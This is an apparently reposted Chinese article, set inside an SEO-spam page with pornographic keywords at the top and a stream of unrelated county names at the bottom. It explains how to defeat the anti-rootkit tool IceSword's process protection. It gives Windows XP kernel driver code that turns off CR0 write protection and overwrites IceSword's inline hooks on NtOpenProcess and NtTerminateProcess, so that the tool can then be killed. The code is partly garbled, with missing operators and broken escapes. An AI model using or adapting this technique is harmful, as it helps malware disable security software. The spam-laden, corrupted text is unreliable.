看看男人日女人,亚洲欧美日韩日本国产三,国产精品欧美日韩区二区,妓女影库妓女网在线视频

突破IceSword自身的進(jìn)程保護(hù)(轉(zhuǎn)貼系列32)

突破IceSword自身的進(jìn)程保護(hù)(轉(zhuǎn)貼系列32)

覺得這篇文章把幾個函數(shù)的作用和關(guān)系理清了,轉(zhuǎn)來共享
IceSword的驅(qū)動對其自身進(jìn)程做了保護(hù),使惡意程序終止不了他。IceSword沒有用HOOK SSDT的方法,不過也沒用什么太BT的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess幾個函數(shù),即修改函數(shù)前5個字節(jié),jmp到他自定義處理函數(shù)例程里。
終止采用這類保護(hù)方法的進(jìn)程,可以使用暴力的PspTerminateProcess方法,PspTerminateProcess函數(shù)未導(dǎo)出,需要我們自己窮舉特征碼搜索來定位,或者硬編碼之。當(dāng)然,我們還可以恢復(fù)IceSword的Inline hook,還原被IceSword掛鉤過的NtOpenProcess、NtTerminateProcess函數(shù),然后在用戶態(tài)上使用普通的終止進(jìn)程的方法就可以終止他了。這里給出了第二種方法的具體代碼,不過由于此篇文章出于科普目的,代碼就寫得馬虎點了,僅適用于Windows XP,因為取SSDT對應(yīng)的函數(shù)索引號用的硬編碼,說明問題而已。NtTerminateProcess未導(dǎo)出,大家可以自己改成通過讀取 ntdll.dll動態(tài)通用的獲得索引號的方法,方法網(wǎng)上有公開,需要的人就自己動點手吧,呵呵~
#include
#define DWORD unsigned long
unsigned char OldCode[5]=”x68xc4x00x00x00″;
unsigned char OldCode2[5]=”x8bxffx55x8bxec”;
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DWORD OpAddr,OpAddr2;
OpAddr=*(KeServiceDescriptorTable.ServiceTableBase 0x7A);
OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase 0x101);
_asm
{
CLI
MOV eax, CR0
AND eax, NOT 10000H
MOV CR0, eax
pushad
mov edi, OpAddr
mov eax, dword ptr OldCode[0]
mov [edi], eax
mov al, byte ptr OldCode[4]
mov [edi 4], al
mov edi, OpAddr2
mov eax, dword ptr OldCode2[0]
mov [edi], eax
mov al, byte ptr OldCode2[4]
mov [edi 4], al
popad
MOV eax, CR0
or eax, 10000H
MOV CR0, eax
STI
}
return STATUS_SUCCESS;
}


相關(guān)新聞

聯(lián)系我們
聯(lián)系我們
在線咨詢
分享本頁
返回頂部
大宁县| 上犹县| 扎兰屯市| 溆浦县| 无锡市| 鄯善县| 汨罗市| 积石山| 南丰县| 景泰县| 岐山县| 浦东新区| 阳山县| 金塔县| 隆德县| 安泽县| 界首市| 临清市| 浙江省| 三都| 大宁县| 岐山县| 扶沟县| 淮南市| 甘肃省| 武胜县| 南陵县| 肥乡县| 贞丰县| 交城县| 松滋市| 玉门市| 沁阳市| 荃湾区| 双城市| 赣榆县| 项城市| 崇义县| 进贤县| 绥芬河市| 芦溪县|